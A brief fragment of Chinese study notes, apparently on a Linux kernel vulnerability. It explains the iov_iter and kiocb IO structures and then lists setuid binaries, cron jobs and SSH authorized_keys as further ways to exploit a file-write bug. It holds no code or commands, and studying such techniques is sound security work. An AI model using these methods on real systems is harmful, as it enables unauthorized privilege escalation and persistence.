  • iov_iter 和 kiocb 实际上分别描述了一次IO的两端,iov_iter描述内存侧,kiocb描述文件侧,文件系统提供两个接口基于这两个数据结构封装读写操作。如call_read_iter调用file->f_op->read_iter, 将kiocb描述的文件数据,读到iov_iter描述的内存中。

  • 另外几种利用: setuid, cron job, Authorized Keys. 其中Authorized Keys的原理是ssh的公钥登录模式.

img

其余详见ppt附件